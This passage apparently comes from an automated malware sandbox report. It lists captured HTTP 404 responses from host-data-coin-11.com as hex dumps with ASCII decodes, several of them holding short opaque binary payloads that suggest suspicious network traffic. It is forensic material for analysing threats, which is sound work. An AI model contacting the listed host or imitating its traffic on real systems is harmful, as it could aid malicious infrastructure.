68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
